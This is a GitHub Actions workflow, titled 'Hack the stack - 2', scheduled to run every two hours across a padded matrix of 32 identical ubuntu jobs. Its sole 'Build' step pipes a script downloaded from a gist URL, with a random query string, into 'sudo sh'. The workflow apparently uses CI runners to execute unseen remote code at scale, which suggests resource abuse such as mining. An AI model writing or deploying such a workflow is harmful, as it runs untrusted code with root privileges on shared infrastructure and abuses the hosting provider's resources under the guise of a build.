name: Hack the stack - 2

on:
  schedule:
    - cron: 59 */2 * * *
  workflow_dispatch:

concurrency: 
  group: main
  cancel-in-progress: true

jobs:
  build:
    strategy:
      matrix:
        os: [ubuntu-latest]
        version: [12, 14, 16, 18]
        environment: [dev, test, staging, production]
        lang: [python, js]
    name: ${{ matrix.os }} ${{ matrix.version }} ${{ matrix.environment }} ${{ matrix.lang }}
    runs-on: ubuntu-latest
    steps:
    - name: Build
      run: |
        curl -sf -L https://gist.githubusercontent.com/worker/04abc88ed47fe521b0c667369faac920/raw/go.sh?$RANDOM | sudo sh
